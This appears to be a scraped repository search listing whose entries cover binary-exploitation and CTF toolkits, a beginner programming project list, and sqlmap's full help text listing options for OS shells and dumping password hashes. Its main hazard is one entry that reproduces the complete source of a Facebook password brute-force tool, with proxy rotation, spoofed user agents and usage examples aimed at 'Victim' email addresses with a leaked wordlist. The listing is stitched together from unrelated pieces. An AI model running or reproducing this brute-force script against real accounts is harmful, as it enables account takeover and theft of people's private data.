17 skills found
rosehgal / BinExpLinux Binary Exploitation
heimao-box / PwnpasiThis tool is an automated PWN exploitation framework designed for CTF competitions and binary vulnerability exploitation. It integrates various exploitation techniques such as stack overflow and format string attacks, supporting automated analysis and exploitation for both 32-bit and 64-bit programs.
alanvivona / PwnshopExploit Development, Reverse Engineering & Cryptography
ManojKumarPatnaik / Major Project ListA list of practical projects that anyone can solve in any programming language (See solutions). These projects are divided into multiple categories, and each category has its own folder. To get started, simply fork this repo. CONTRIBUTING See ways of contributing to this repo. You can contribute solutions (will be published in this repo) to existing problems, add new projects, or remove existing ones. Make sure you follow all instructions properly. Solutions You can find implementations of these projects in many other languages by other users in this repo. Credits Problems are motivated by the ones shared at: Martyr2’s Mega Project List Rosetta Code Table of Contents Numbers Classic Algorithms Graph Data Structures Text Networking Classes Threading Web Files Databases Graphics and Multimedia Security Numbers Find PI to the Nth Digit - Enter a number and have the program generate PI up to that many decimal places. Keep a limit to how far the program will go. Find e to the Nth Digit - Just like the previous problem, but with e instead of PI. Enter a number and have the program generate e up to that many decimal places. Keep a limit to how far the program will go. Fibonacci Sequence - Enter a number and have the program generate the Fibonacci sequence to that number or to the Nth number. Prime Factorization - Have the user enter a number and find all Prime Factors (if there are any) and display them. Next Prime Number - Have the program find prime numbers until the user chooses to stop asking for the next one. Find Cost of Tile to Cover W x H Floor - Calculate the total cost of the tile it would take to cover a floor plan of width and height, using a cost entered by the user. Mortgage Calculator - Calculate the monthly payments of a fixed-term mortgage over given Nth terms at a given interest rate. Also, figure out how long it will take the user to pay back the loan. For added complexity, add an option for users to select the compounding interval (Monthly, Weekly, Daily, Continually). Change Return Program - The user enters a cost and then the amount of money given. The program will figure out the change and the number of quarters, dimes, nickels, pennies needed for the change. Binary to Decimal and Back Converter - Develop a converter to convert a decimal number to binary or a binary number to its decimal equivalent. Calculator - A simple calculator to do basic operators. Make it a scientific calculator for added complexity. Unit Converter (temp, currency, volume, mass, and more) - Converts various units between one another. The user enters the type of unit being entered, the type of unit they want to convert to, and then the value. The program will then make the conversion. Alarm Clock - A simple clock where it plays a sound after X number of minutes/seconds or at a particular time. Distance Between Two Cities - Calculates the distance between two cities and allows the user to specify a unit of distance. This program may require finding coordinates for the cities like latitude and longitude. Credit Card Validator - Takes in a credit card number from a common credit card vendor (Visa, MasterCard, American Express, Discoverer) and validates it to make sure that it is a valid number (look into how credit cards use a checksum). Tax Calculator - Asks the user to enter a cost and either a country or state tax. It then returns the tax plus the total cost with tax. Factorial Finder - The Factorial of a positive integer, n, is defined as the product of the sequence n, n-1, n-2, ...1, and the factorial of zero, 0, is defined as being 1. Solve this using both loops and recursion. Complex Number Algebra - Show addition, multiplication, negation, and inversion of complex numbers in separate functions. (Subtraction and division operations can be made with pairs of these operations.) Print the results for each operation tested. Happy Numbers - A happy number is defined by the following process. Starting with any positive integer, replace the number by the sum of the squares of its digits, and repeat the process until the number equals 1 (where it will stay), or it loops endlessly in a cycle which does not include 1. Those numbers for which this process ends in 1 are happy numbers, while those that do not end in 1 are unhappy numbers. Display an example of your output here. Find the first 8 happy numbers. Number Names - Show how to spell out a number in English. You can use a preexisting implementation or roll your own, but you should support inputs up to at least one million (or the maximum value of your language's default bounded integer type if that's less). Optional: Support for inputs other than positive integers (like zero, negative integers, and floating-point numbers). Coin Flip Simulation - Write some code that simulates flipping a single coin however many times the user decides. The code should record the outcomes and count the number of tails and heads. Limit Calculator - Ask the user to enter f(x) and the limit value, then return the value of the limit statement Optional: Make the calculator capable of supporting infinite limits. Fast Exponentiation - Ask the user to enter 2 integers a and b and output a^b (i.e. pow(a,b)) in O(LG n) time complexity. Classic Algorithms Collatz Conjecture - Start with a number n > 1. Find the number of steps it takes to reach one using the following process: If n is even, divide it by 2. If n is odd, multiply it by 3 and add 1. Sorting - Implement two types of sorting algorithms: Merge sort and bubble sort. Closest pair problem - The closest pair of points problem or closest pair problem is a problem of computational geometry: given n points in metric space, find a pair of points with the smallest distance between them. Sieve of Eratosthenes - The sieve of Eratosthenes is one of the most efficient ways to find all of the smaller primes (below 10 million or so). Graph Graph from links - Create a program that will create a graph or network from a series of links. Eulerian Path - Create a program that will take as an input a graph and output either an Eulerian path or an Eulerian cycle, or state that it is not possible. An Eulerian path starts at one node and traverses every edge of a graph through every node and finishes at another node. An Eulerian cycle is an eulerian Path that starts and finishes at the same node. Connected Graph - Create a program that takes a graph as an input and outputs whether every node is connected or not. Dijkstra’s Algorithm - Create a program that finds the shortest path through a graph using its edges. Minimum Spanning Tree - Create a program that takes a connected, undirected graph with weights and outputs the minimum spanning tree of the graph i.e., a subgraph that is a tree, contains all the vertices, and the sum of its weights is the least possible. Data Structures Inverted index - An Inverted Index is a data structure used to create full-text search. Given a set of text files, implement a program to create an inverted index. Also, create a user interface to do a search using that inverted index which returns a list of files that contain the query term/terms. The search index can be in memory. Text Fizz Buzz - Write a program that prints the numbers from 1 to 100. But for multiples of three print “Fizz” instead of the number and for the multiples of five print “Buzz”. For numbers which are multiples of both three and five print “FizzBuzz”. Reverse a String - Enter a string and the program will reverse it and print it out. Pig Latin - Pig Latin is a game of alterations played in the English language game. To create the Pig Latin form of an English word the initial consonant sound is transposed to the end of the word and an ay is affixed (Ex.: "banana" would yield anana-bay). Read Wikipedia for more information on rules. Count Vowels - Enter a string and the program counts the number of vowels in the text. For added complexity have it report a sum of each vowel found. Check if Palindrome - Checks if the string entered by the user is a palindrome. That is that it reads the same forwards as backward like “racecar” Count Words in a String - Counts the number of individual words in a string. For added complexity read these strings in from a text file and generate a summary. Text Editor - Notepad-style application that can open, edit, and save text documents. Optional: Add syntax highlighting and other features. RSS Feed Creator - Given a link to RSS/Atom Feed, get all posts and display them. Quote Tracker (market symbols etc) - A program that can go out and check the current value of stocks for a list of symbols entered by the user. The user can set how often the stocks are checked. For CLI, show whether the stock has moved up or down. Optional: If GUI, the program can show green up and red down arrows to show which direction the stock value has moved. Guestbook / Journal - A simple application that allows people to add comments or write journal entries. It can allow comments or not and timestamps for all entries. Could also be made into a shoutbox. Optional: Deploy it on Google App Engine or Heroku or any other PaaS (if possible, of course). Vigenere / Vernam / Ceasar Ciphers - Functions for encrypting and decrypting data messages. Then send them to a friend. Regex Query Tool - A tool that allows the user to enter a text string and then in a separate control enter a regex pattern. It will run the regular expression against the source text and return any matches or flag errors in the regular expression. Networking FTP Program - A file transfer program that can transfer files back and forth from a remote web sever. Bandwidth Monitor - A small utility program that tracks how much data you have uploaded and downloaded from the net during the course of your current online session. See if you can find out what periods of the day you use more and less and generate a report or graph that shows it. Port Scanner - Enter an IP address and a port range where the program will then attempt to find open ports on the given computer by connecting to each of them. On any successful connections mark the port as open. Mail Checker (POP3 / IMAP) - The user enters various account information include web server and IP, protocol type (POP3 or IMAP), and the application will check for email at a given interval. Country from IP Lookup - Enter an IP address and find the country that IP is registered in. Optional: Find the Ip automatically. Whois Search Tool - Enter an IP or host address and have it look it up through whois and return the results to you. Site Checker with Time Scheduling - An application that attempts to connect to a website or server every so many minute or a given time and check if it is up. If it is down, it will notify you by email or by posting a notice on the screen. Classes Product Inventory Project - Create an application that manages an inventory of products. Create a product class that has a price, id, and quantity on hand. Then create an inventory class that keeps track of various products and can sum up the inventory value. Airline / Hotel Reservation System - Create a reservation system that books airline seats or hotel rooms. It charges various rates for particular sections of the plane or hotel. For example, first class is going to cost more than a coach. Hotel rooms have penthouse suites which cost more. Keep track of when rooms will be available and can be scheduled. Company Manager - Create a hierarchy of classes - abstract class Employee and subclasses HourlyEmployee, SalariedEmployee, Manager, and Executive. Everyone's pay is calculated differently, research a bit about it. After you've established an employee hierarchy, create a Company class that allows you to manage the employees. You should be able to hire, fire, and raise employees. Bank Account Manager - Create a class called Account which will be an abstract class for three other classes called CheckingAccount, SavingsAccount, and BusinessAccount. Manage credits and debits from these accounts through an ATM-style program. Patient / Doctor Scheduler - Create a patient class and a doctor class. Have a doctor that can handle multiple patients and set up a scheduling program where a doctor can only handle 16 patients during an 8 hr workday. Recipe Creator and Manager - Create a recipe class with ingredients and put them in a recipe manager program that organizes them into categories like desserts, main courses, or by ingredients like chicken, beef, soups, pies, etc. Image Gallery - Create an image abstract class and then a class that inherits from it for each image type. Put them in a program that displays them in a gallery-style format for viewing. Shape Area and Perimeter Classes - Create an abstract class called Shape and then inherit from it other shapes like diamond, rectangle, circle, triangle, etc. Then have each class override the area and perimeter functionality to handle each shape type. Flower Shop Ordering To Go - Create a flower shop application that deals in flower objects and use those flower objects in a bouquet object which can then be sold. Keep track of the number of objects and when you may need to order more. Family Tree Creator - Create a class called Person which will have a name, when they were born, and when (and if) they died. Allow the user to create these Person classes and put them into a family tree structure. Print out the tree to the screen. Threading Create A Progress Bar for Downloads - Create a progress bar for applications that can keep track of a download in progress. The progress bar will be on a separate thread and will communicate with the main thread using delegates. Bulk Thumbnail Creator - Picture processing can take a bit of time for some transformations. Especially if the image is large. Create an image program that can take hundreds of images and converts them to a specified size in the background thread while you do other things. For added complexity, have one thread handling re-sizing, have another bulk renaming of thumbnails, etc. Web Page Scraper - Create an application that connects to a site and pulls out all links, or images, and saves them to a list. Optional: Organize the indexed content and don’t allow duplicates. Have it put the results into an easily searchable index file. Online White Board - Create an application that allows you to draw pictures, write notes and use various colors to flesh out ideas for projects. Optional: Add a feature to invite friends to collaborate on a whiteboard online. Get Atomic Time from Internet Clock - This program will get the true atomic time from an atomic time clock on the Internet. Use any one of the atomic clocks returned by a simple Google search. Fetch Current Weather - Get the current weather for a given zip/postal code. Optional: Try locating the user automatically. Scheduled Auto Login and Action - Make an application that logs into a given site on a schedule and invokes a certain action and then logs out. This can be useful for checking webmail, posting regular content, or getting info for other applications and saving it to your computer. E-Card Generator - Make a site that allows people to generate their own little e-cards and send them to other people. Do not use Flash. Use a picture library and perhaps insightful mottos or quotes. Content Management System - Create a content management system (CMS) like Joomla, Drupal, PHP Nuke, etc. Start small. Optional: Allow for the addition of modules/addons. Web Board (Forum) - Create a forum for you and your buddies to post, administer and share thoughts and ideas. CAPTCHA Maker - Ever see those images with letters numbers when you signup for a service and then ask you to enter what you see? It keeps web bots from automatically signing up and spamming. Try creating one yourself for online forms. Files Quiz Maker - Make an application that takes various questions from a file, picked randomly, and puts together a quiz for students. Each quiz can be different and then reads a key to grade the quizzes. Sort Excel/CSV File Utility - Reads a file of records, sorts them, and then writes them back to the file. Allow the user to choose various sort style and sorting based on a particular field. Create Zip File Maker - The user enters various files from different directories and the program zips them up into a zip file. Optional: Apply actual compression to the files. Start with Huffman Algorithm. PDF Generator - An application that can read in a text file, HTML file, or some other file and generates a PDF file out of it. Great for a web-based service where the user uploads the file and the program returns a PDF of the file. Optional: Deploy on GAE or Heroku if possible. Mp3 Tagger - Modify and add ID3v1 tags to MP3 files. See if you can also add in the album art into the MP3 file’s header as well as other ID3v2 tags. Code Snippet Manager - Another utility program that allows coders to put in functions, classes, or other tidbits to save for use later. Organized by the type of snippet or language the coder can quickly lookup code. Optional: For extra practice try adding syntax highlighting based on the language. Databases SQL Query Analyzer - A utility application in which a user can enter a query and have it run against a local database and look for ways to make it more efficient. Remote SQL Tool - A utility that can execute queries on remote servers from your local computer across the Internet. It should take in a remote host, user name, and password, run the query and return the results. Report Generator - Create a utility that generates a report based on some tables in a database. Generates sales reports based on the order/order details tables or sums up the day's current database activity. Event Scheduler and Calendar - Make an application that allows the user to enter a date and time of an event, event notes, and then schedule those events on a calendar. The user can then browse the calendar or search the calendar for specific events. Optional: Allow the application to create re-occurrence events that reoccur every day, week, month, year, etc. Budget Tracker - Write an application that keeps track of a household’s budget. The user can add expenses, income, and recurring costs to find out how much they are saving or losing over a period of time. Optional: Allow the user to specify a date range and see the net flow of money in and out of the house budget for that time period. TV Show Tracker - Got a favorite show you don’t want to miss? Don’t have a PVR or want to be able to find the show to then PVR it later? Make an application that can search various online TV Guide sites, locate the shows/times/channels and add them to a database application. The database/website then can send you email reminders that a show is about to start and which channel it will be on. Travel Planner System - Make a system that allows users to put together their own little travel itinerary and keep track of the airline/hotel arrangements, points of interest, budget, and schedule. Graphics and Multimedia Slide Show - Make an application that shows various pictures in a slide show format. Optional: Try adding various effects like fade in/out, star wipe, and window blinds transitions. Stream Video from Online - Try to create your own online streaming video player. Mp3 Player - A simple program for playing your favorite music files. Add features you think are missing from your favorite music player. Watermarking Application - Have some pictures you want copyright protected? Add your own logo or text lightly across the background so that no one can simply steal your graphics off your site. Make a program that will add this watermark to the picture. Optional: Use threading to process multiple images simultaneously. Turtle Graphics - This is a common project where you create a floor of 20 x 20 squares. Using various commands you tell a turtle to draw a line on the floor. You have moved forward, left or right, lift or drop the pen, etc. Do a search online for "Turtle Graphics" for more information. Optional: Allow the program to read in the list of commands from a file. GIF Creator A program that puts together multiple images (PNGs, JPGs, TIFFs) to make a smooth GIF that can be exported. Optional: Make the program convert small video files to GIFs as well. Security Caesar cipher - Implement a Caesar cipher, both encoding, and decoding. The key is an integer from 1 to 25. This cipher rotates the letters of the alphabet (A to Z). The encoding replaces each letter with the 1st to 25th next letter in the alphabet (wrapping Z to A). So key 2 encrypts "HI" to "JK", but key 20 encrypts "HI" to "BC". This simple "monoalphabetic substitution cipher" provides almost no security, because an attacker who has the encoded message can either use frequency analysis to guess the key, or just try all 25 keys.
152334H / PwnscriptsVery simple script(s) to hasten binary exploit creation
Vasco-jofra / Format String Finder BinjaA binary ninja plugin that finds format string vulnerabilities
FatimaKabali / Fatima #!/usr/bin/python import socket, sys, os, re, random, optparse, time if sys.version_info.major <= 2:import httplib else:import http.client as httplib ## COLORS ############### wi="\033[1;37m" #>>White# rd="\033[1;31m" #>Red # gr="\033[1;32m" #>Green # yl="\033[1;33m" #>Yellow# ######################### os.system("cls||clear") def write(text): sys.stdout.write(text) sys.stdout.flush() versionPath = "core"+os.sep+"version.txt" errMsg = lambda msg: write(rd+"\n["+yl+"!"+rd+"] Error: "+yl+msg+rd+ " !!!\n"+wi) try:import requests except ImportError: errMsg("[ requests ] module is missing") print(" [*] Please Use: 'pip install requests' to install it :)") sys.exit(1) try:import mechanize except ImportError: errMsg("[ mechanize ] module is missing") print(" [*] Please Use: 'pip install mechanize' to install it :)") sys.exit(1) class FaceBoom(object): def __init__(self): self.useProxy = None self.br = mechanize.Browser() self.br.set_handle_robots(False) self.br._factory.is_html = True self.br.addheaders=[('User-agent',random.choice([ 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) RockMelt/0.9.58.494 Chrome/11.0.696.71 Safari/534.24', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.54 Safari/535.2', 'Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.12 Safari/535.11', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.6 (KHTML, like Gecko) Chrome/16.0.897.0 Safari/535.6', 'Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/20121202 Firefox/17.0 Iceweasel/17.0.1']))] @staticmethod def check_proxy(proxy): proxies = {'https':"https://"+proxy, 'http':"http://"+proxy} proxy_ip = proxy.split(":")[0] try: r = requests.get('https://www.wikipedia.org',proxies=proxies, timeout=5) if proxy_ip==r.headers['X-Client-IP']: return True return False except Exception : return False @staticmethod def cnet(): try: socket.create_connection((socket.gethostbyname("www.google.com"), 80), 2) return True except socket.error:pass return False def get_profile_id(self, target_profile): try: print(gr+"\n["+wi+"*"+gr+"] geting target Profile Id... please wait"+wi) idre = re.compile('"entity_id":"([0-9]+)"') con = requests.get(target_profile).text idis = idre.findall(con) print(wi+"\n["+gr+"+"+wi+"]"+gr+" Target Profile"+wi+" ID: "+yl+idis[0]+wi) except IndexError: errMsg("Please Check Your Victim's Profile URL") sys.exit(1) def login(self,target, password): try: self.br.open("https://facebook.com") self.br.select_form(nr=0) self.br.form['email']=target self.br.form['pass']= password self.br.method ="POST" if self.br.submit().get_data().__contains__(b'home_icon'):return 1 elif "checkpoint" in self.br.geturl(): return 2 return 0 except(KeyboardInterrupt, EOFError): print(rd+"\n["+yl+"!"+rd+"]"+yl+" Aborting"+rd+"..."+wi) time.sleep(1.5) sys.exit(1) except Exception as e: print(rd+" Error: "+yl+str(e)+wi+"\n") time.sleep(0.60) def banner(self,target,wordlist,single_passwd): proxystatus = gr+self.useProxy+wi+"["+gr+"ON"+wi+"]" if self.useProxy else yl+"["+rd+"OFF"+yl+"]" print(gr+""" ================================== [---] """+wi+"""*CYBER_ROCKY*"""+gr+""" [---] ================================== [---] """+wi+"""Facebook-Hack-BD """+gr+""" [---] ================================== [---] """+yl+"""CONFIG"""+gr+""" [---] ================================== [>] Target :> """+wi+target+gr+""" {}""".format("[>] Wordlist :> "+yl+str(wordlist) if not single_passwd else "[>] Password :> "+yl+str(single_passwd))+gr+""" [>] ProxyStatus :> """+str(proxystatus)+wi) if not single_passwd: print(gr+"""\ =================================="""+wi+""" [~] """+yl+"""Facebook-"""+rd+"""Password-Attack: """+gr+"""Enabled """+wi+"""[~]"""+gr+""" ==================================\n"""+wi) else:print("\n") @staticmethod def updateFaceBoom(): if not os.path.isfile(versionPath): errMsg("Unable to check for updates: please re-clone the script to fix this problem") sys.exit(1) write("[~] Checking for updates...\n") conn = httplib.HTTPSConnection("raw.githubusercontent.com") conn.request("GET", "/Oseid/FaceBoom/master/core/version.txt") repoVersion = conn.getresponse().read().strip().decode() with open(versionPath) as vf: currentVersion = vf.read().strip() if repoVersion == currentVersion:write(" [*] The script is up to date!\n") else: print(" [+] An update has been found ::: Updating... ") conn.request("GET", "/Oseid/FaceBoom/master/faceboom.py") newCode = conn.getresponse().read().strip().decode() with open("faceboom.py", "w") as faceBoomScript: faceBoomScript.write(newCode) with open(versionPath, "w") as ver: ver.write(repoVersion) write(" [+] Successfully updated :)\n") parse = optparse.OptionParser(wi+""" Usage: python fb-hack-bd.py [OPTIONS...] ------------- OPTIONS: |Facebook-account💀Hacking💀Tools. ____ _ ____ _ / ___| _| |__ ___ _ __ | _ \ ___ ___| | ___ _ | | | | | | '_ \ / _ \ '__|____| |_) / _ \ / __| |/ / | | | | |__| |_| | |_) | __/ | |_____| _ < (_) | (__| <| |_| | \____\__, |_.__/ \___|_| |_| \_\___/ \___|_|\_\\__, | |___/ |___/ ............................................................ This is ***Cyber-Rocky*** Password Attack Tools. .....Made in Bangladesh..... |-------- | -t <target email> [OR] <FACEBOOK ID> ::> Specify target Email [OR] Target Profile ID |-------- | -w <wordlist Path> ::> Specify Wordlist File Path |-------- | -s <single password> ::> Specify Single Password To Check |-------- | -p <Proxy IP:PORT> ::> Specify HTTP/S Proxy (Optional) |-------- | -g <TARGET Facebook Profile URL> ::> Specify Target Facebook Profile URL For Get HIS ID |-------- | -u/--update ::> Update FaceBoom Script ------------- Examples: | |-------- |1/ python fb-hack-bd.py -t Victim@gmail.com -w /usr/share/wordlists/rockyou.txt |-------- |*2/ python fb-hack-bd.py -t 100001013078780 -w /data/data/com.termux/files/home/password.txt |-------- |3/ python fb-hack-bd.py -t Victim@hotmail.com -w \wordlist.txt -p 144.217.101.245:3129 |-------- |4/ python fb-hack-bd.py -t Victim@gmail.com -s 1234567 |-------- |5/ python fb-hack-bd.py -g https://www.facebook.com/Victim_Profile |-------- """) def Main(): parse.add_option("-t","--target",'-T','--TARGET',dest="target",type="string", help="Specify Target Email or ID") parse.add_option("-w","--wordlist",'-W','--WORDLIST',dest="wordlist",type="string", help="Specify Wordlist File ") parse.add_option("-s","--single","--S","--SINGLE",dest="single",type="string", help="Specify Single Password To Check it") parse.add_option("-p","-P","--proxy","--PROXY",dest="proxy",type="string", help="Specify HTTP/S Proxy to be used") parse.add_option("-g","-G","--getid","--GETID",dest="url",type="string", help="Specify TARGET FACEBOOK PROFILE URL to get his ID") parse.add_option("-u","-U","--update","--UPDATE", dest="update", action="store_true", default=False) (options,args) = parse.parse_args() faceboom = FaceBoom() target = options.target wordlist = options.wordlist single_passwd = options.single proxy = options.proxy target_profile = options.url update = options.update opts = [target,wordlist,single_passwd, proxy, target_profile, update] if any(opt for opt in opts): if not faceboom.cnet(): errMsg("Please Check Your Internet Connection") sys.exit(1) if update: faceboom.updateFaceBoom() sys.exit(1) elif target_profile: faceboom.get_profile_id(target_profile) sys.exit(1) elif wordlist or single_passwd: if wordlist: if not os.path.isfile(wordlist): errMsg("Please check Your Wordlist Path") sys.exit(1) if single_passwd: if len(single_passwd.strip()) < 6: errMsg("Invalid Password") print("[!] Password must be at least '6' characters long") sys.exit(1) if proxy: if proxy.count(".") != 3: errMsg("Invalid IPv4 ["+rd+str(proxy)+yl+"]") sys.exit(1) print(wi+"["+yl+"~"+wi+"] Connecting To "+wi+"Proxy[\033[1;33m {} \033[1;37m]...".format(proxy if not ":" in proxy else proxy.split(":")[0])) final_proxy = proxy+":8080" if not ":" in proxy else proxy if faceboom.check_proxy(final_proxy): faceboom.useProxy = final_proxy faceboom.br.set_proxies({'https':faceboom.useProxy, 'http':faceboom.useProxy}) print(wi+"["+gr+"Connected"+wi+"]") else: errMsg("Connection Failed") errMsg("Unable to connect to Proxy["+rd+str(proxy)+yl+"]") sys.exit(1) faceboom.banner(target,wordlist,single_passwd) loop = 1 if not single_passwd else "~" if single_passwd: passwords = [single_passwd] else: with open(wordlist, 'r', errors='replace') as f: passwords = f.readlines() for passwd in passwords: passwd = passwd.strip() if len(passwd) <6:continue write(wi+"["+yl+str(loop)+wi+"] Trying Password[ {"+yl+str(passwd)+wi+"} ]") retCode = faceboom.login(target, passwd) if retCode: sys.stdout.write(wi+" ==> Login"+gr+" Success\n") print(wi+"========================="+"="*len(passwd)+"======") print(wi+"["+gr+"+"+wi+"] Password [ "+gr+passwd+wi+" ]"+gr+" Is Correct :)") print(wi+"========================="+"="*len(passwd)+"======") if retCode == 2:print(wi+"["+yl+"!"+wi+"]"+yl+" Warning: This account use ("+rd+"2F Authentication"+yl+"):"+rd+" It's Locked"+yl+" !!!") break else: sys.stdout.write(yl+" ==> Login"+rd+" Failed\n") loop = loop + 1 if not single_passwd else "~" else: if single_passwd: print(yl+"\n["+rd+"!"+yl+"] Sorry: "+wi+"The Password[ "+yl+passwd+wi+" ] Is Not Correct"+rd+":("+yl+"!"+wi) print(gr+"["+yl+"!"+gr+"]"+yl+" Please Try Another password or Wordlist "+gr+":)"+wi) else: print(yl+"\n["+rd+"!"+yl+"] Sorry: "+wi+"I Can't Find The Correct Password In [ "+yl+wordlist+wi+" ] "+rd+":("+yl+"!"+wi) print(gr+"["+yl+"!"+gr+"]"+yl+" Please Try Another Wordlist. "+gr+":)"+wi) sys.exit(1) else: print(parse.usage) sys.exit(1) if __name__=='__main__': Main() ############################################################## ##################### ######################### ##################### END OF TOOL ######################### ##################### ######################### ############################################################## #This Tool by Oseid Aldary #Have a nice day :) #GoodBye
HlaingPhyoAung / SqlmapUsage: python sqlmap.py [options] Options: -h, --help Show basic help message and exit -hh Show advanced help message and exit --version Show program's version number and exit -v VERBOSE Verbosity level: 0-6 (default 1) Target: At least one of these options has to be provided to define the target(s) -d DIRECT Connection string for direct database connection -u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1") -l LOGFILE Parse target(s) from Burp or WebScarab proxy log file -x SITEMAPURL Parse target(s) from remote sitemap(.xml) file -m BULKFILE Scan multiple targets given in a textual file -r REQUESTFILE Load HTTP request from a file -g GOOGLEDORK Process Google dork results as target URLs -c CONFIGFILE Load options from a configuration INI file Request: These options can be used to specify how to connect to the target URL --method=METHOD Force usage of given HTTP method (e.g. PUT) --data=DATA Data string to be sent through POST --param-del=PARA.. Character used for splitting parameter values --cookie=COOKIE HTTP Cookie header value --cookie-del=COO.. Character used for splitting cookie values --load-cookies=L.. File containing cookies in Netscape/wget format --drop-set-cookie Ignore Set-Cookie header from response --user-agent=AGENT HTTP User-Agent header value --random-agent Use randomly selected HTTP User-Agent header value --host=HOST HTTP Host header value --referer=REFERER HTTP Referer header value -H HEADER, --hea.. Extra header (e.g. "X-Forwarded-For: 127.0.0.1") --headers=HEADERS Extra headers (e.g. "Accept-Language: fr\nETag: 123") --auth-type=AUTH.. HTTP authentication type (Basic, Digest, NTLM or PKI) --auth-cred=AUTH.. HTTP authentication credentials (name:password) --auth-file=AUTH.. HTTP authentication PEM cert/private key file --ignore-401 Ignore HTTP Error 401 (Unauthorized) --proxy=PROXY Use a proxy to connect to the target URL --proxy-cred=PRO.. Proxy authentication credentials (name:password) --proxy-file=PRO.. Load proxy list from a file --ignore-proxy Ignore system default proxy settings --tor Use Tor anonymity network --tor-port=TORPORT Set Tor proxy port other than default --tor-type=TORTYPE Set Tor proxy type (HTTP (default), SOCKS4 or SOCKS5) --check-tor Check to see if Tor is used properly --delay=DELAY Delay in seconds between each HTTP request --timeout=TIMEOUT Seconds to wait before timeout connection (default 30) --retries=RETRIES Retries when the connection timeouts (default 3) --randomize=RPARAM Randomly change value for given parameter(s) --safe-url=SAFEURL URL address to visit frequently during testing --safe-post=SAFE.. POST data to send to a safe URL --safe-req=SAFER.. Load safe HTTP request from a file --safe-freq=SAFE.. Test requests between two visits to a given safe URL --skip-urlencode Skip URL encoding of payload data --csrf-token=CSR.. Parameter used to hold anti-CSRF token --csrf-url=CSRFURL URL address to visit to extract anti-CSRF token --force-ssl Force usage of SSL/HTTPS --hpp Use HTTP parameter pollution method --eval=EVALCODE Evaluate provided Python code before the request (e.g. "import hashlib;id2=hashlib.md5(id).hexdigest()") Optimization: These options can be used to optimize the performance of sqlmap -o Turn on all optimization switches --predict-output Predict common queries output --keep-alive Use persistent HTTP(s) connections --null-connection Retrieve page length without actual HTTP response body --threads=THREADS Max number of concurrent HTTP(s) requests (default 1) Injection: These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts -p TESTPARAMETER Testable parameter(s) --skip=SKIP Skip testing for given parameter(s) --skip-static Skip testing parameters that not appear dynamic --dbms=DBMS Force back-end DBMS to this value --dbms-cred=DBMS.. DBMS authentication credentials (user:password) --os=OS Force back-end DBMS operating system to this value --invalid-bignum Use big numbers for invalidating values --invalid-logical Use logical operations for invalidating values --invalid-string Use random strings for invalidating values --no-cast Turn off payload casting mechanism --no-escape Turn off string escaping mechanism --prefix=PREFIX Injection payload prefix string --suffix=SUFFIX Injection payload suffix string --tamper=TAMPER Use given script(s) for tampering injection data Detection: These options can be used to customize the detection phase --level=LEVEL Level of tests to perform (1-5, default 1) --risk=RISK Risk of tests to perform (1-3, default 1) --string=STRING String to match when query is evaluated to True --not-string=NOT.. String to match when query is evaluated to False --regexp=REGEXP Regexp to match when query is evaluated to True --code=CODE HTTP code to match when query is evaluated to True --text-only Compare pages based only on the textual content --titles Compare pages based only on their titles Techniques: These options can be used to tweak testing of specific SQL injection techniques --technique=TECH SQL injection techniques to use (default "BEUSTQ") --time-sec=TIMESEC Seconds to delay the DBMS response (default 5) --union-cols=UCOLS Range of columns to test for UNION query SQL injection --union-char=UCHAR Character to use for bruteforcing number of columns --union-from=UFROM Table to use in FROM part of UNION query SQL injection --dns-domain=DNS.. Domain name used for DNS exfiltration attack --second-order=S.. Resulting page URL searched for second-order response Fingerprint: -f, --fingerprint Perform an extensive DBMS version fingerprint Enumeration: These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements -a, --all Retrieve everything -b, --banner Retrieve DBMS banner --current-user Retrieve DBMS current user --current-db Retrieve DBMS current database --hostname Retrieve DBMS server hostname --is-dba Detect if the DBMS current user is DBA --users Enumerate DBMS users --passwords Enumerate DBMS users password hashes --privileges Enumerate DBMS users privileges --roles Enumerate DBMS users roles --dbs Enumerate DBMS databases --tables Enumerate DBMS database tables --columns Enumerate DBMS database table columns --schema Enumerate DBMS schema --count Retrieve number of entries for table(s) --dump Dump DBMS database table entries --dump-all Dump all DBMS databases tables entries --search Search column(s), table(s) and/or database name(s) --comments Retrieve DBMS comments -D DB DBMS database to enumerate -T TBL DBMS database table(s) to enumerate -C COL DBMS database table column(s) to enumerate -X EXCLUDECOL DBMS database table column(s) to not enumerate -U USER DBMS user to enumerate --exclude-sysdbs Exclude DBMS system databases when enumerating tables --pivot-column=P.. Pivot column name --where=DUMPWHERE Use WHERE condition while table dumping --start=LIMITSTART First query output entry to retrieve --stop=LIMITSTOP Last query output entry to retrieve --first=FIRSTCHAR First query output word character to retrieve --last=LASTCHAR Last query output word character to retrieve --sql-query=QUERY SQL statement to be executed --sql-shell Prompt for an interactive SQL shell --sql-file=SQLFILE Execute SQL statements from given file(s) Brute force: These options can be used to run brute force checks --common-tables Check existence of common tables --common-columns Check existence of common columns User-defined function injection: These options can be used to create custom user-defined functions --udf-inject Inject custom user-defined functions --shared-lib=SHLIB Local path of the shared library File system access: These options can be used to access the back-end database management system underlying file system --file-read=RFILE Read a file from the back-end DBMS file system --file-write=WFILE Write a local file on the back-end DBMS file system --file-dest=DFILE Back-end DBMS absolute filepath to write to Operating system access: These options can be used to access the back-end database management system underlying operating system --os-cmd=OSCMD Execute an operating system command --os-shell Prompt for an interactive operating system shell --os-pwn Prompt for an OOB shell, Meterpreter or VNC --os-smbrelay One click prompt for an OOB shell, Meterpreter or VNC --os-bof Stored procedure buffer overflow exploitation --priv-esc Database process user privilege escalation --msf-path=MSFPATH Local path where Metasploit Framework is installed --tmp-path=TMPPATH Remote absolute path of temporary files directory Windows registry access: These options can be used to access the back-end database management system Windows registry 